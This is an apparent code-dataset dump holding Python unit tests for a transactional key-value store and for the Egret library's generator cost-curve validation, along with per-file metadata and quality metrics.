hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
13da1d4f70aaca3db046cf8ee091cdd0130ab8fb
| 11,412
|
py
|
Python
|
test.py
|
ShamansCoding/simple_database
|
a342496c545254f85ed97ed1bf79a07e8ecf7ebf
|
[
"MIT"
] | null | null | null |
test.py
|
ShamansCoding/simple_database
|
a342496c545254f85ed97ed1bf79a07e8ecf7ebf
|
[
"MIT"
] | null | null | null |
test.py
|
ShamansCoding/simple_database
|
a342496c545254f85ed97ed1bf79a07e8ecf7ebf
|
[
"MIT"
] | null | null | null |
# Standard-library imports plus Python 2/3 compatibility shims for
# StringIO and unittest.mock.
import sys
import unittest

try:
    # Python 2: StringIO lives in its own top-level module.
    from StringIO import StringIO
except ImportError:
    # Catch ImportError, not ModuleNotFoundError: ModuleNotFoundError only
    # exists on Python 3.6+, so naming it in the except clause would raise
    # NameError on Python 3.0-3.5 the moment the import actually failed.
    # ImportError is its base class and works everywhere.
    from io import StringIO

try:
    # Python 3: mock ships with the standard library.
    from unittest.mock import patch
except ImportError:
    # Python 2: fall back to the external 'mock' backport.
    from mock import patch

from data_base import DataBase, call_method, main, HELP
class MockForTest(object):
    """Minimal stand-in exposing one single-argument method.

    Used by CallMethodTest to exercise call_method() without needing the
    real database object.
    """

    def some_method(self, args):
        # Always report success; the argument is accepted but ignored.
        return 'success'
class DataBaseTest(unittest.TestCase):
    """Unit tests for the DataBase class.

    Tests set up transaction scenarios by assigning the private
    attributes _storage, _transaction_number, _rollback_cache and
    _rolling_back directly, instead of going through BEGIN/SET each time.
    Printed output is verified by temporarily swapping sys.stdout for a
    StringIO buffer.
    """

    def setUp(self):
        # Fresh, empty database for every test.
        self.database = DataBase()

    def test_set(self):
        """SET stores a key/value pair."""
        self.database.SET('A', '10')
        self.assertEqual(self.database._storage, {'A': '10'})

    def test_set_twice(self):
        """Setting the same key twice keeps a single entry."""
        self.database.SET('A', '10')
        self.database.SET('A', '10')
        self.assertEqual(self.database._storage, {'A': '10'})

    def test_set_two_values(self):
        """Distinct keys are stored independently."""
        self.database.SET('A', '10')
        self.database.SET('B', '10')
        self.assertEqual(self.database._storage, {'A': '10', 'B': '10'})

    def test_set_in_transaction(self):
        """SET of a new key in a transaction logs a compensating UNSET op."""
        self.database._storage = {'A': '10'}
        self.database._transaction_number = 1
        self.database._rollback_cache[1] = []
        self.database.SET('B', '20')
        self.assertEqual(self.database._storage, {'A': '10', 'B': '20'})
        self.assertEqual(self.database._rollback_cache,
                         {1: [('UNSET', 'B')]})

    def test_set_in_transaction_twice(self):
        """A second SET of the same key logs a compensating SET op."""
        self.database._storage = {'A': '10'}
        self.database._transaction_number = 1
        self.database._rollback_cache[1] = []
        self.database.SET('B', '20')
        self.database.SET('B', '20')
        self.assertEqual(self.database._storage, {'A': '10', 'B': '20'})
        self.assertEqual(self.database._rollback_cache,
                         {1: [('UNSET', 'B'), ('SET', 'B', '20')]})

    def test_set_in_transaction_rolling_back(self):
        """While a rollback is in progress, SET must not log new rollback ops."""
        self.database._storage = {'A': '10'}
        self.database._transaction_number = 1
        self.database._rollback_cache[1] = []
        self.database._rolling_back = True
        self.database.SET('B', '20')
        self.assertEqual(self.database._storage, {'A': '10', 'B': '20'})
        self.assertEqual(self.database._rollback_cache, {1: []})

    def test_get(self):
        """GET prints the stored value."""
        self.database._storage = {'A': '10'}
        capturedOutput = StringIO()
        sys.stdout = capturedOutput
        self.database.GET('A')
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), '10\n')

    def test_get_null(self):
        """GET of a missing key prints NULL."""
        capturedOutput = StringIO()
        sys.stdout = capturedOutput
        self.database.GET('A')
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), 'NULL\n')

    def test_unset(self):
        """UNSET removes an existing key."""
        self.database._storage = {'A': '10'}
        self.database.UNSET('A')
        self.assertEqual(self.database._storage, {})

    def test_unset_no_key(self):
        """UNSET of a missing key is a silent no-op."""
        self.database._storage = {}
        self.database.UNSET('A')
        self.assertEqual(self.database._storage, {})

    def test_unset_in_transaction(self):
        """UNSET in a transaction logs a SET op to restore the old value."""
        self.database._storage = {'A': '10'}
        self.database._transaction_number = 1
        self.database._rollback_cache[1] = []
        self.database.UNSET('A')
        self.assertEqual(self.database._storage, {})
        self.assertEqual(self.database._rollback_cache,
                         {1: [('SET', 'A', '10')]})

    def test_unset_in_transaction_twice(self):
        """A second UNSET of the now-missing key adds no extra rollback op."""
        self.database._storage = {'A': '10'}
        self.database._transaction_number = 1
        self.database._rollback_cache[1] = []
        self.database.UNSET('A')
        self.database.UNSET('A')
        self.assertEqual(self.database._storage, {})
        self.assertEqual(self.database._rollback_cache,
                         {1: [('SET', 'A', '10')]})

    def test_unset_in_transaction_rolling_back(self):
        """While a rollback is in progress, UNSET must not log rollback ops."""
        self.database._storage = {'A': '10'}
        self.database._transaction_number = 1
        self.database._rollback_cache[1] = []
        self.database._rolling_back = True
        self.database.UNSET('A')
        self.assertEqual(self.database._storage, {})
        self.assertEqual(self.database._rollback_cache, {1: []})

    def test_counts(self):
        """COUNTS prints how many keys hold the given value."""
        self.database._storage = {'A': '10'}
        capturedOutput = StringIO()
        sys.stdout = capturedOutput
        self.database.COUNTS('10')
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), '1\n')

    def test_counts_no_value(self):
        """COUNTS prints 0 when no key holds the value."""
        self.database._storage = {'A': '11'}
        capturedOutput = StringIO()
        sys.stdout = capturedOutput
        self.database.COUNTS('10')
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), '0\n')

    def test_counts_two_values(self):
        """COUNTS counts every key that holds the value."""
        self.database._storage = {'A': '10', 'B': '10'}
        capturedOutput = StringIO()
        sys.stdout = capturedOutput
        self.database.COUNTS('10')
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), '2\n')

    def test_find(self):
        """FIND prints the key holding the value."""
        self.database._storage = {'A': '10'}
        capturedOutput = StringIO()
        sys.stdout = capturedOutput
        self.database.FIND('10')
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), 'A\n')

    def test_find_no_value(self):
        """FIND prints an empty line when nothing matches."""
        self.database._storage = {'A': '11'}
        capturedOutput = StringIO()
        sys.stdout = capturedOutput
        self.database.FIND('10')
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), '\n')

    def test_find_two_values(self):
        """FIND prints all matching keys, space-separated."""
        self.database._storage = {'A': '10', 'B': '10'}
        capturedOutput = StringIO()
        sys.stdout = capturedOutput
        self.database.FIND('10')
        sys.stdout = sys.__stdout__
        self.assertEqual(capturedOutput.getvalue(), 'A B\n')

    def test_begin(self):
        """BEGIN bumps the transaction number and opens a rollback slot."""
        self.assertEqual(self.database._transaction_number, 0)
        self.assertEqual(self.database._rollback_cache, {})
        self.database.BEGIN()
        self.assertEqual(self.database._transaction_number, 1)
        self.assertEqual(self.database._rollback_cache, {1: []})

    def test_begin_twice(self):
        """Nested BEGINs get their own rollback slots."""
        self.assertEqual(self.database._transaction_number, 0)
        self.assertEqual(self.database._rollback_cache, {})
        self.database.BEGIN()
        self.assertEqual(self.database._transaction_number, 1)
        self.assertEqual(self.database._rollback_cache, {1: []})
        self.database.BEGIN()
        self.assertEqual(self.database._transaction_number, 2)
        self.assertEqual(self.database._rollback_cache, {1: [], 2: []})

    def test_rollback(self):
        """ROLLBACK replays the logged ops and closes the transaction."""
        self.assertEqual(self.database._transaction_number, 0)
        self.assertEqual(self.database._rollback_cache, {})
        self.assertEqual(self.database._rolling_back, False)
        self.database._transaction_number = 1
        self.database._storage = {'A': '10', 'B': '10'}
        self.database._rollback_cache = {1: [('UNSET', 'B')]}
        self.database.ROLLBACK()
        self.assertEqual(self.database._transaction_number, 0)
        self.assertEqual(self.database._rollback_cache, {})
        self.assertEqual(self.database._rolling_back, False)
        self.assertEqual(self.database._storage, {'A': '10'})

    def test_rollback_same_key_edited_twice(self):
        """Two logged ops for one key still restore the pre-transaction state.

        The expected result implies the ops are replayed newest-first
        (('SET', 'B', '10') then ('UNSET', 'B') leaves B absent) --
        NOTE(review): confirm the replay order against DataBase.ROLLBACK.
        """
        self.assertEqual(self.database._transaction_number, 0)
        self.assertEqual(self.database._rollback_cache, {})
        self.assertEqual(self.database._rolling_back, False)
        self.database._transaction_number = 1
        self.database._storage = {'A': '10'}
        self.database._rollback_cache = {1: [('UNSET', 'B'),
                                             ('SET', 'B', '10')]}
        self.database.ROLLBACK()
        self.assertEqual(self.database._transaction_number, 0)
        self.assertEqual(self.database._rollback_cache, {})
        self.assertEqual(self.database._rolling_back, False)
        self.assertEqual(self.database._storage, {'A': '10'})

    def test_rollback_nested(self):
        """ROLLBACK undoes only the innermost transaction's ops."""
        self.assertEqual(self.database._transaction_number, 0)
        self.assertEqual(self.database._rollback_cache, {})
        self.assertEqual(self.database._rolling_back, False)
        self.database._transaction_number = 2
        self.database._storage = {'A': '10', 'B': '10'}
        self.database._rollback_cache = {1: [('UNSET', 'B')],
                                         2: [('SET', 'C', '3')]}
        self.database.ROLLBACK()
        self.assertEqual(self.database._transaction_number, 1)
        self.assertEqual(self.database._rollback_cache, {1: [('UNSET', 'B')]})
        self.assertEqual(self.database._rolling_back, False)
        self.assertEqual(self.database._storage,
                         {'A': '10', 'C': '3', 'B': '10'})

    def test_commit(self):
        """COMMIT discards the rollback log and closes the transaction."""
        self.database._transaction_number = 1
        self.database._rollback_cache = {1: [('UNSET', 'B')]}
        self.database.COMMIT()
        self.assertEqual(self.database._transaction_number, 0)
        self.assertEqual(self.database._rollback_cache, {})
class CallMethodTest(unittest.TestCase):
    """Tests for the call_method() dispatcher, using MockForTest as target."""

    def setUp(self):
        self.test_instance = MockForTest()

    def test_call_method(self):
        """A known method name with the right argument count dispatches."""
        self.assertTrue(
            call_method(self.test_instance, ['some_method', '1']))

    def test_call_method_invalid_name(self):
        """An unknown method name fails and prints a hint."""
        captured = StringIO()
        sys.stdout = captured
        outcome = call_method(self.test_instance, ['invalid_method', '1'])
        sys.stdout = sys.__stdout__
        self.assertFalse(outcome)
        self.assertEqual(
            captured.getvalue(),
            ' -> Invalid method name. To get methods names type HELP.\n'
        )

    def test_call_method_invalid_args_number(self):
        """A wrong argument count fails and names the method."""
        captured = StringIO()
        sys.stdout = captured
        outcome = call_method(self.test_instance, ['some_method'])
        sys.stdout = sys.__stdout__
        self.assertFalse(outcome)
        # NOTE(review): 'argumets' mirrors the message data_base actually
        # prints; fixing the spelling here alone would break the test.
        self.assertEqual(
            captured.getvalue(),
            ' -> Invalid number of argumets for some_method\n'
        )
class MainTest(unittest.TestCase):
    """Tests for the interactive main() loop with input and dispatch mocked."""

    @patch('data_base.call_method')
    @patch('data_base.input')
    def test_main(self, mock_input, mock_call_method):
        """main() greets the user and exits after the mocked dispatch."""
        mock_input.side_effect = ['METHOD', 'END']
        # NOTE(review): handing sys.exit back from call_method appears to be
        # what terminates the loop -- confirm against data_base.main.
        mock_call_method.return_value = sys.exit
        captured = StringIO()
        sys.stdout = captured
        main()
        sys.stdout = sys.__stdout__
        expected = ('Welcome to simple database! Type HELP for help.\n'
                    'Exiting database...\n')
        self.assertEqual(captured.getvalue(), expected)

    @patch('data_base.call_method')
    @patch('data_base.input')
    def test_main_help(self, mock_input, mock_call_method):
        """Typing HELP prints the HELP text before exiting."""
        mock_input.side_effect = ['HELP', 'END']
        mock_call_method.return_value = sys.exit
        captured = StringIO()
        sys.stdout = captured
        main()
        sys.stdout = sys.__stdout__
        expected = ('Welcome to simple database! Type HELP for help.\n' +
                    HELP + '\n' +
                    'Exiting database...\n')
        self.assertEqual(captured.getvalue(), expected)
# Allow running this test module directly: python test.py
if __name__ == '__main__':
    unittest.main()
| 30.513369
| 78
| 0.616018
| 1,253
| 11,412
| 5.357542
| 0.078212
| 0.216297
| 0.141516
| 0.201102
| 0.883361
| 0.864591
| 0.854164
| 0.847162
| 0.829584
| 0.796067
| 0
| 0.018714
| 0.246144
| 11,412
| 373
| 79
| 30.595174
| 0.761595
| 0
| 0
| 0.660232
| 0
| 0
| 0.056344
| 0.00368
| 0
| 0
| 0
| 0
| 0.250965
| 1
| 0.127413
| false
| 0
| 0.030888
| 0.003861
| 0.177606
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13db9c0d5b3894c08c7d618e08b4abc5b6674e99
| 26,760
|
py
|
Python
|
egret/model_library/transmission/tests/test_tx_utils.py
|
barguel/Egret
|
2df021d08ca4c1722a7b16eab3f512ba0e7c6a1d
|
[
"BSD-3-Clause"
] | null | null | null |
egret/model_library/transmission/tests/test_tx_utils.py
|
barguel/Egret
|
2df021d08ca4c1722a7b16eab3f512ba0e7c6a1d
|
[
"BSD-3-Clause"
] | null | null | null |
egret/model_library/transmission/tests/test_tx_utils.py
|
barguel/Egret
|
2df021d08ca4c1722a7b16eab3f512ba0e7c6a1d
|
[
"BSD-3-Clause"
] | 1
|
2021-08-18T16:44:20.000Z
|
2021-08-18T16:44:20.000Z
|
import unittest
from egret.model_library.transmission import tx_utils
import logging
import copy
def _example_quadratic(p):
return 0.05 * p ** 2 + p + 3
def example_pw_curve():
    """Build a piecewise-linear cost-curve dict sampled from the quadratic.

    The curve holds five (power, cost) breakpoints at p = 10, 30, 50,
    70, 90, each costed by _example_quadratic.
    """
    breakpoints = (10, 30, 50, 70, 90)
    curve = dict()
    curve['data_type'] = 'cost_curve'
    curve['cost_curve_type'] = 'piecewise'
    curve['values'] = [(p, _example_quadratic(p)) for p in breakpoints]
    return curve
def example_poly_curve():
    """Build a polynomial cost-curve dict for 3 + p + 0.05*p**2.

    'values' maps polynomial degree to coefficient.
    """
    return {
        'data_type': 'cost_curve',
        'cost_curve_type': 'polynomial',
        'values': {0: 3, 1: 1, 2: 0.05},
    }
class TestValidateCostCurves(unittest.TestCase):
    """Unit tests for tx_utils.validate_and_clean_cost_curve.

    Piecewise cases use example_pw_curve() (five points of the quadratic
    0.05*p**2 + p + 3 at p = 10..90); polynomial cases use
    example_poly_curve().  Several tests reset the module-level
    warn-once flag validate_and_clean_cost_curve._printed_warning so
    later tests can observe the warning again.
    """

    def test_pw_simple(self):
        """With p_min/p_max at the endpoints the values pass through, copied."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=10, p_max=90, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, curve['values'])
        self.assertIsNot(cleaned_values, curve['values'])

    def test_wrong_curve_type(self):
        """A data_type other than the requested curve_type is rejected."""
        curve = example_pw_curve()
        curve['data_type'] = 'blah'
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=10, p_max=90, gen_name='foo', t=None)

    def test_pw_no_values(self):
        """An empty values list passes through but logs a warning."""
        curve = example_pw_curve()
        curve['values'] = list()
        with self.assertLogs('egret.model_library.transmission.tx_utils',
                             level=logging.WARNING) as cm:
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=10, p_max=90, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, curve['values'])
        self.assertIsNot(cleaned_values, curve['values'])
        self.assertEqual(cm.output, ['WARNING:egret.model_library.transmission.tx_utils:WARNING: Generator foo has no cost information associated with it'])

    def test_pw_repeat_value_and_cost(self):
        """An exactly duplicated breakpoint is dropped silently."""
        curve = example_pw_curve()
        orig_values = copy.deepcopy(curve['values'])
        curve['values'].insert(2, (30, _example_quadratic(30)))
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=10, p_max=90, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, orig_values)

    def test_pw_repeat_value(self):
        """The same power with two different costs is rejected."""
        curve = example_pw_curve()
        curve['values'].insert(2, (30, _example_quadratic(40)))
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=10, p_max=90, gen_name='foo', t=None)

    def test_pw_nonconvex(self):
        """A breakpoint that breaks convexity is rejected."""
        curve = example_pw_curve()
        curve['values'].insert(2, (35, _example_quadratic(20)))
        with self.assertRaises(ValueError):
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=10, p_max=90, gen_name='foo', t=None)

    def test_pw_low_p_min(self):
        """p_min below the curve extends the first segment, with a warning."""
        curve = example_pw_curve()
        expected_values = copy.deepcopy(curve['values'])
        expected_values.pop(0)
        expected_values.insert(0, (5, 3))
        with self.assertLogs('egret.model_library.transmission.tx_utils',
                             level=logging.WARNING) as cm:
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=5, p_max=90, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(cleaned_values, curve['values'])
        self.assertEqual(cm.output, ['WARNING:egret.model_library.transmission.tx_utils:WARNING: Extending piecewise linear cost curve beyond p_min and/or p_max for generator foo (and perhaps others)'])
        # reset for next test
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pw_high_p_max(self):
        """p_max above the curve extends the last segment, with a warning."""
        curve = example_pw_curve()
        expected_values = copy.deepcopy(curve['values'])
        expected_values.pop(-1)
        expected_values.append((95, 543))
        with self.assertLogs('egret.model_library.transmission.tx_utils',
                             level=logging.WARNING) as cm:
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=10, p_max=95, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(cleaned_values, curve['values'])
        self.assertEqual(cm.output, ['WARNING:egret.model_library.transmission.tx_utils:WARNING: Extending piecewise linear cost curve beyond p_min and/or p_max for generator foo (and perhaps others)'])
        # reset for next test
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pw_high_p_max_low_p_min_debug(self):
        """After the first warning, later extensions log at DEBUG only."""
        curve = example_pw_curve()
        # evoke warning once
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=10, p_max=95, gen_name='foo', t=None)
        expected_values = example_pw_curve()['values']
        expected_values.pop(-1)
        expected_values.append((95, 543))
        expected_values.pop(0)
        expected_values.insert(0, (5, 3))
        with self.assertLogs('egret.model_library.transmission.tx_utils',
                             level=logging.DEBUG) as cm:
            cleaned_values = tx_utils.validate_and_clean_cost_curve(
                curve=curve, curve_type='cost_curve',
                p_min=5, p_max=95, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(cleaned_values, curve['values'])
        # debug output this time
        self.assertEqual(cm.output, ['DEBUG:egret.model_library.transmission.tx_utils:WARNING: Extending piecewise linear cost curve beyond p_min and/or p_max for generator foo'])
        # reset for next test
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_extra_pw_pieces_below_pmin(self):
        """Breakpoints at or below p_min on a breakpoint are trimmed."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=30, p_max=90, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, curve['values'][1:])
        self.assertIsNot(cleaned_values, curve['values'])

    def test_extra_pw_pieces_below_pmin2(self):
        """p_min between breakpoints interpolates a new first point."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=85, p_max=90, gen_name='foo', t=None)
        expected_values = [(85, 453), (90, 498)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(cleaned_values, curve['values'])

    def test_extra_pw_pieces_above_pmax(self):
        """Breakpoints above p_max on a breakpoint are trimmed."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=10, p_max=70, gen_name='foo', t=None)
        self.assertEqual(cleaned_values, curve['values'][:-1])
        self.assertIsNot(cleaned_values, curve['values'])

    def test_extra_pw_pieces_above_pmax2(self):
        """p_max between breakpoints interpolates a new last point."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=10, p_max=15, gen_name='foo', t=None)
        expected_values = [(10, 18), (15, 33)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(cleaned_values, curve['values'])

    def test_pw_repeated_slope(self):
        """Collinear interior points collapse to the two endpoints."""
        curve = dict()
        curve['data_type'] = 'cost_curve'
        curve['cost_curve_type'] = 'piecewise'
        curve['values'] = [(10, 20),
                           (30, 40),
                           (50, 60),
                           (70, 80),
                           (90, 100)]
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=10, p_max=90, gen_name='foo', t=None)
        expected_values = [(10, 20), (90, 100)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])

    def test_pw_repeated_slope2(self):
        """Collinear runs collapse while real slope changes are kept."""
        curve = dict()
        curve['data_type'] = 'cost_curve'
        curve['cost_curve_type'] = 'piecewise'
        curve['values'] = [(10, 20),
                           (30, 40),
                           (50, 60),
                           (70, 90),
                           (90, 120)]
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=5, p_max=100, gen_name='foo', t=None)
        expected_values = [(5, 15), (50, 60), (100, 135)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pw_pmin_is_pmax_on_curve(self):
        """p_min == p_max inside the curve yields one interpolated point."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=40, p_max=40, gen_name='foo', t=None)
        expected_values = [(40, 128)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])

    def test_pw_pmin_is_pmax_single_point(self):
        """A one-point curve matching p_min == p_max passes through."""
        curve = example_pw_curve()
        curve = dict()
        curve['data_type'] = 'cost_curve'
        curve['cost_curve_type'] = 'piecewise'
        curve['values'] = [(40, 128)]
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=40, p_max=40, gen_name='foo', t=None)
        expected_values = [(40, 128)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])

    def test_pmax_less_than_first_point(self):
        """A range entirely below the curve extrapolates the first segment."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=-5, p_max=5, gen_name='foo', t=None)
        expected_values = [(-5, -27), (5, 3)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pmax_less_than_first_point2(self):
        """p_min == p_max below the curve extrapolates a single point."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=5, p_max=5, gen_name='foo', t=None)
        expected_values = [(5, 3)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pmax_is_first_point(self):
        """p_max exactly at the first breakpoint extrapolates below it."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=0, p_max=10, gen_name='foo', t=None)
        expected_values = [(0, -12), (10, 18)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pmax_is_first_point2(self):
        """p_min == p_max at the first breakpoint yields that one point."""
        curve = example_pw_curve()
        cleaned_values = tx_utils.validate_and_clean_cost_curve(
            curve=curve, curve_type='cost_curve',
            p_min=10, p_max=10, gen_name='foo', t=None)
        expected_values = [(10, 18)]
        self.assertEqual(cleaned_values, expected_values)
        self.assertIsNot(expected_values, curve['values'])
        tx_utils.validate_and_clean_cost_curve._printed_warning = False

    def test_pmin_greater_than_last_point(self):
